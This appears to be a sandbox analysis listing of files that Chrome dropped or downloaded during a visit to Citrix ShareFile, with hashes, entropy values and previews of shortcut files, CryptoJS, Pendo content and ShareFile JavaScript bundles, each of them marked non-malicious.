                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,....n.../......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IeYq.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VeY}.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VeY}.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VeY}............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VeY.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............c......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 5 18:35:59 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2681
                                                                                                                                                                                                                      Entropy (8bit):3.991795454667428
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:8d51lduTn7OTNH/0idAKZdA1VehBiZUk1W1qeh4y+C:8d51GWTRX9Yy
                                                                                                                                                                                                                      MD5:4C4046C26B02198B9A641677CCC4960E
                                                                                                                                                                                                                      SHA1:092D43B3A0B705E0D8BB6CDBAD4B1B5473B13655
                                                                                                                                                                                                                      SHA-256:9F2346E10E7857D473A04D0DAD4239A7B31802FCBFCFA8DF63EFC368F8EA1144
                                                                                                                                                                                                                      SHA-512:C22C672BD9E47EAFB48DB595242A46FEB79A8C6669E7CF8C0E564C66D97E94EE04126A2B8F7032271B2B77B48690164EBEE25EC4796F5332D18394310D2E45D2
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,.....:../......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IeYq.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VeY}.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VeY}.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VeY}............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VeY.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............c......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Nov 5 18:35:59 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2683
                                                                                                                                                                                                                      Entropy (8bit):4.000683845279894
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:8B1lduTn7OTNH/0idAKZdA1duT6ehOuTbbiZUk5OjqehOuTbyy+yT+:8B1GWTRzTTTbxWOvTbyy7T
                                                                                                                                                                                                                      MD5:311887947D4FD03B0E603B9504CE3158
                                                                                                                                                                                                                      SHA1:2D39DC515BBB8A1086B4139517603164E0A5348F
                                                                                                                                                                                                                      SHA-256:2301A0673DB3F06CBCDF820B8087CD8F0457F05F51DF4803151C0049DC3199E0
                                                                                                                                                                                                                      SHA-512:4959816896ED71DE51D81FFD065DC26253FBE8728B8A30D28DC813EDBFBF7BD14D432A68B961BB4F0C6D694B812007F10FF793D04FBBE57E9AFDAF843AC44564
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:L..................F.@.. ...$+.,....K0../......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.IeYq.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VeY}.....L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.VeY}.....M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.VeY}............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VeY.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i.............c......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):48316
                                                                                                                                                                                                                      Entropy (8bit):5.6346993394709
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                                                                                                      MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                                                                                                      SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                                                                                                      SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                                                                                                      SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (22063), with no line terminators
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):22064
                                                                                                                                                                                                                      Entropy (8bit):4.8654655187166815
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:5OhzKJPKAzEf7PBVqxj2E6SgTIaFSgTId6jJi9NhKjUcSgTI5bSgTId6MfKKw3s6:HnKtxCQxwWHpEV+bi
                                                                                                                                                                                                                      MD5:D2702DCFED567BCA070F8FC55EE3BBE6
                                                                                                                                                                                                                      SHA1:13B0C79DBD613889BDD32D6234DAE9CAEAA3CE8C
                                                                                                                                                                                                                      SHA-256:B530C482126F2B86447E3A7E6F9319C8FCCD071659A3BAF914E8C51589AEF220
                                                                                                                                                                                                                      SHA-512:8EEF7953E5B4623BEB6A423CB05D675E881D6B761EB5B5B7A4DCE0778B5F016452F37F907EE401D7E291204980AA521EB6E58C6D17D9ED81B7B2A66AC0E2F6AC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://citrix-sharefile-content.customer.pendo.io/guide-content/eWI7aCe5RTaQQM3QzyK1rqqWcVM/XNJ1F6ATudKnb82a7viL5T2TM6g/E7DHnb1hOIm90y1iNNrpyuqjzow.dom.json?sha256=tTDEghJvK4ZEfjp-b5MZyPzNBxZZo7r5FOjFFYmu8iA
                                                                                                                                                                                                                      Preview:{"props":{"id":"pendo-base","data-layout":"tooltipBlank","class":"_pendo-step-container"},"type":"div","children":[{"css":[{"selector":"#pendo-close-guide-0978f7b0:hover","styles":{"color":"#D9D7D7"}},{"selector":"[data-pendo-poll-id=\"rxgstdttrrq\"]::placeholder","styles":{"color":"#999999FF"}},{"selector":"[data-pendo-poll-id=\"rxgstdttrrq\"]:focus","styles":{"outline":"none","box-shadow":"#00000080 0px 0px 2px 0px"}},{"selector":"#pendo-button-bca5c491:hover","styles":{"background":"rgba(73, 63, 185, 1)","border":"2px solid #493FB9","color":"#FFFFFF","font-weight":400,"border-radius":"8px"}},{"selector":"#pendo-button-799bec88:hover","styles":{"background":"rgba(73, 63, 185, 1)","border":"2px solid #FFFFFF","color":"#FFFFFF","font-weight":400,"border-radius":"8px"}},{"selector":"div[tabindex=-1]:focus","styles":{}}],"type":"style","props":{"type":"text/css","scoped":"scoped"}},{"props":{"id":"pendo-g-XNJ1F6ATudKnb82a7viL5T2TM6g","data-vertical-alignment":"Relative to Element","data-
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://app.launchdarkly.com/sdk/goals/5f33f5d44f29ea099db90d2a
                                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65455)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):775350
                                                                                                                                                                                                                      Entropy (8bit):5.700291031990132
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12288:NvDvC2NB3iRaEYalRrszCKn74REaE3HKiJPQ+kfOpPKK+EN:dC+uq3jlkG
                                                                                                                                                                                                                      MD5:67DD564568419099F49EBDED11913E6C
                                                                                                                                                                                                                      SHA1:D6C7A69E75B7D3198A2B7C6328F5749AE4404E44
                                                                                                                                                                                                                      SHA-256:29308B97856BB4C6561F2736C6034D4DE750F6AAFD63076752E699C17DB20D24
                                                                                                                                                                                                                      SHA-512:C709F2203DA7328E18ED1E23816D891EED082CE72AD75F47E5EA7989F1CE97EAFF0F1BEFE2E9B10F775779689F153A2C810F604E4CF25728F34DDF83A7148426
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-esign-pilet/1.220.5/package/dist/index.js
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevesignpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var n={},i={},o={},r={},a={},s={},l={};return Object.defineProperty(r,"__esModule",{value:!0}),{setters:[function(e){n.AccountsEntity=e.AccountsEntity,n.Api=e.Api,n.ContactListType=e.ContactListType,n.ContactsEntity=e.ContactsEntity,n.CustomWorkflowBundleType=e.CustomWorkflowBundleType,n.FileVirusStatus=e.FileVirusStatus,n.IntegrationProvider=e.IntegrationProvider,n.IntegrationsEntity=e.IntegrationsEntity,n.ItemOperations=e.ItemOperations,n.ItemOrderingMode=e.ItemOrderingMode,n.ItemsEntity=e.ItemsEntity,n.RightSignatureEntity=e.RightSignatureEntity,n.Uploader=e.Uploader,n.UserRole=e.UserRole,n.UsersEntity=e.UsersEntity,n.createFolder=e.createFolder,n.isCustomWorkflowBundle=e.isCustomWorkflowBundle,n.isFile=e.isFile,n.isFolder=e.isFolder,n.isLink=e.isLink,n.isMedicalStudyBundle=e.isMedicalStudyBundle,n
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):23
                                                                                                                                                                                                                      Entropy (8bit):3.708132064658602
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3:YMEsRa:YMpo
                                                                                                                                                                                                                      MD5:2E3B4BDE9D3F0B12A1B68BF76DEA5B5E
                                                                                                                                                                                                                      SHA1:0EADE51D11409D2C996FFAF140DAAE6AECCC1E6D
                                                                                                                                                                                                                      SHA-256:4E8F3099517F69EADF38031D9284E1F8AB90BEFD6F84C998F79CD9ECEEB53C76
                                                                                                                                                                                                                      SHA-512:E01EA974F92B67BB31A6EA3D977089CC3E961239583B88F1A443DC5659A83B16ADE0A7769F08B69D7BA66052E018A7A824FCB0F172AC630E586574BBC382960B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://api.ipify.org/?format=json
                                                                                                                                                                                                                      Preview:{"ip":"173.254.250.76"}
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):47992
                                                                                                                                                                                                                      Entropy (8bit):5.605846858683577
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                                                                                                                                                                      MD5:CF3402D7483B127DED4069D651EA4A22
                                                                                                                                                                                                                      SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                                                                                                                                                                      SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                                                                                                                                                                      SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                                                                                                                                                                                                                      Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65477)
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):188870
                                                                                                                                                                                                                      Entropy (8bit):5.316783423719702
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:xZ2Qw6hfT5ppCWE9xpCAsdyiDlpf9s80zYKsvy5/YGZ:xXw6hfT5ppFEHpChdyqf+80zYKsq5/F
                                                                                                                                                                                                                      MD5:3EB98FC30E286B34AE6A699333C2B13C
                                                                                                                                                                                                                      SHA1:77C23C14692750726264F041C4A4A5AE8500F342
                                                                                                                                                                                                                      SHA-256:A32F71A5A80553B0D31399E96A2288F045B600E289446F601D032909AB5B6614
                                                                                                                                                                                                                      SHA-512:A1D7564C6D92A10087C813DC68FAA3C4B031B5BD97FB435B4C7470B8FF73218A6D74B24F5AA6786F0A98FF1C8BF2457728358BADE24037FCFF4732B2ED2E21AC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevpublisherpilet,{}).System.register(["react","react-dom","tslib"],(function(e,t){var r={},n={},o={};return Object.defineProperty(r,"__esModule",{value:!0}),Object.defineProperty(n,"__esModule",{value:!0}),{setters:[function(e){Object.keys(e).forEach((function(t){r[t]=e[t]}))},function(e){Object.keys(e).forEach((function(t){n[t]=e[t]}))},function(e){o.__awaiter=e.__awaiter,o.__rest=e.__rest}],execute:function(){e((()=>{var e,i,s={2910:(e,t,r)=>{"use strict";r.d(t,{FK:()=>ke,Y:()=>Te,FD:()=>je});var n=r(4848),o=r(4726);var i=function(){function e(e){var t=this;this._insertTag=function(e){var r;r=0===t.tags.length?t.insertionPoint?t.insertionPoint.nextSibling:t.prepend?t.container.firstChild:t.before:t.tags[t.tags.length-1].nextSibling,t.container.insertBefore(e,r),t.tags.push(e)},this.isSpeedy=e.speedy===undefined||e.speedy,this.tags=[],this.ctr=0,this.nonce=e.nonce,this.key=e.key,this.container=e.container,this.prepend=e.prepend,this.insertionPoint
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65472)
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):124348
                                                                                                                                                                                                                      Entropy (8bit):5.387460323033051
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:Pr9SpHEVxpUZK4ut5tDu+SeZyFPqb7agGHkoG+cOsOHBf8ag:PRvVxpN4+tqPMOqHOTSb
                                                                                                                                                                                                                      MD5:4E4E4FD0B0580EF04C25C9DB829E370F
                                                                                                                                                                                                                      SHA1:4867DE5753E3320EF0A1AB5FE3E9CD1E4EFBF2F4
                                                                                                                                                                                                                      SHA-256:F699158E6689E3633E4553562FE73AE320E42781263E5E50906725B2E988D8BF
                                                                                                                                                                                                                      SHA-512:1D138579D2E563CE7454147700B13EA52CB487A716B39DA4A4C9E9508F567353DB7149F2F297050DD729A598A275F0014BEEB52EC7CB6844A3C856930B5B1BB4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevtaskaggregatorpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={};return Object.defineProperty(i,"__esModule",{value:!0}),Object.defineProperty(s,"__esModule",{value:!0}),{setters:[function(e){n.Api=e.Api,n.CustomWorkflowBundleType=e.CustomWorkflowBundleType,n.ItemOrderingMode=e.ItemOrderingMode,n.ItemsEntity=e.ItemsEntity,n.UsersEntity=e.UsersEntity,n.createFolder=e.createFolder,n.isCustomWorkflowBundle=e.isCustomWorkflowBundle,n.isFile=e.isFile,n.isFolder=e.isFolder,n.isLink=e.isLink,n.isMedicalStudyBundle=e.isMedicalStudyBundle,n.isNote=e.isNote,n.isRequestListBundle=e.isRequestListBundle,n.isSymbolicLink=e.isSymbolicLink,n.isWorkflowBundle=e.isWorkflowBundle},function(e){r.colorPalette=e.colorPalette,r.sizes=e.sizes},function(e){o.Avatar=e.Avatar,o.Button=e.Button,o.Card=e.Card,o.Col=e.Col,o.Divider=e.Divider,o.Empty=e.Empty,o.Flex=e.Flex
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65475)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):261475
                                                                                                                                                                                                                      Entropy (8bit):5.454849456214367
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:iShvOcJT0sAGy2JXeKisbEaAAjWrIQhyzXxV41uIV/9Hs2Z4tPVYuf4B:iSxOrsAGy2JXuAFV4JV/B4FVYj
                                                                                                                                                                                                                      MD5:48252B007677ADFABB0EA62C8028A30E
                                                                                                                                                                                                                      SHA1:09B5B74B71F55FAFF7EE55E44CF4ED5FA01162D2
                                                                                                                                                                                                                      SHA-256:FA747E224CA94227FD110B638E6D45E1AAAD1C38E8CDCB18FDF1035EAB8C018C
                                                                                                                                                                                                                      SHA-512:BC054C876647F042FEFD102F7C884B7ABA0CF8528CB28FC203E0881968FADAA7CC9B664EB7D8D8BFED1783C129D49945D5A1F2511C621AE10DDA729BF7135416
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-request-list-pilet/1.10.1/package/dist/index.js
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevrequestlistpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},a={},i={},s={},c={},u={};return Object.defineProperty(a,"__esModule",{value:!0}),Object.defineProperty(u,"__esModule",{value:!0}),{setters:[function(e){n.AccountsEntity=e.AccountsEntity,n.Api=e.Api,n.BundleType=e.BundleType,n.CapabilitiesEntity=e.CapabilitiesEntity,n.CapabilityName=e.CapabilityName,n.ContactListType=e.ContactListType,n.ContactsEntity=e.ContactsEntity,n.CustomWorkflowBundleType=e.CustomWorkflowBundleType,n.DocumentApprovalWorkflowAction=e.DocumentApprovalWorkflowAction,n.EncryptedEmailsEntity=e.EncryptedEmailsEntity,n.ExceptionReason=e.ExceptionReason,n.FileAction=e.FileAction,n.FileLockEntity=e.FileLockEntity,n.FileVirusStatus=e.FileVirusStatus,n.IntegrationProvider=e.IntegrationProvider,n.IntegrationsEntity=e.IntegrationsEntity,n.ItemOperations
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (46236)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):133363
                                                                                                                                                                                                                      Entropy (8bit):5.385698488954991
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:Vst4ceI7j1jcp0TRQ8Up0yR+SFpmrIORYo:Gt/n7jxcp0sp0PSFpmb
                                                                                                                                                                                                                      MD5:13DC49E47065015D15EF3BAFE1F88202
                                                                                                                                                                                                                      SHA1:34EECBB791D1B71783D5C3E43C02AA7F6DBD57D7
                                                                                                                                                                                                                      SHA-256:B99BBE311D0388066430D45B8377348E9C52ED029EB79AAF4E7211CBF92EB8A6
                                                                                                                                                                                                                      SHA-512:C3955D865F846E475AAF8C9879E5C89E0C92511718F28A71257FD7E0AEF5384C9FF7A6EB793C15574AB0022B2144BCD2380A8E35FBFB003072B6B9C286A37A49
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-dynamic-forms-pilet/1.39.0/package/dist/index.js
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevdynamicformspilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var r={},n={},o={},i={},a={},s={},c={};return Object.defineProperty(i,"__esModule",{value:!0}),Object.defineProperty(c,"__esModule",{value:!0}),{setters:[function(e){r.ItemsEntity=e.ItemsEntity,r.Uploader=e.Uploader,r.UserRole=e.UserRole,r.UsersEntity=e.UsersEntity,r.ZoneService=e.ZoneService,r.createFile=e.createFile},function(e){n.colorPalette=e.colorPalette,n.sizes=e.sizes},function(e){o.Alert=e.Alert,o.App=e.App,o.Badge=e.Badge,o.Breadcrumb=e.Breadcrumb,o.Button=e.Button,o.Card=e.Card,o.Checkbox=e.Checkbox,o.Col=e.Col,o.Collapse=e.Collapse,o.DatePicker=e.DatePicker,o.Divider=e.Divider,o.Drawer=e.Drawer,o.Dropdown=e.Dropdown,o.Empty=e.Empty,o.Flex=e.Flex,o.Form=e.Form,o.Input=e.Input,o.InputNumber=e.InputNumber,o.Layout=e.Layout,o.Modal=e.Modal,o.Pagination=e.Pagination,o.Popconfirm=e.Popcon
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (6378)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):6490
                                                                                                                                                                                                                      Entropy (8bit):5.257387004754639
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:y2hG7a+HNCBCQ4vk8LJQM3nRoP7uFjOsMeZ:ia+H4BC3DLJTnRoP7uUi
                                                                                                                                                                                                                      MD5:FAE76DAE7784930E96292B65FEEDBC0D
                                                                                                                                                                                                                      SHA1:AFFD25E6159BE1645F1FFE8CE4BAFBF8D9710C3C
                                                                                                                                                                                                                      SHA-256:69B7DBF013D733F4E7A1313102219E1D58DFA5F7D95D2ED590B88D935C8B1E84
                                                                                                                                                                                                                      SHA-512:6B345E391AAB93D802A5B11FEF39EB86814027124CE7A9E45CBC63007316285900B095455DF21B73F542E8C60FC38E3ADF38B01DAF35CC70E98F118C719D6A30
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-remediation-pilet/1.3.0/package/dist/index.js
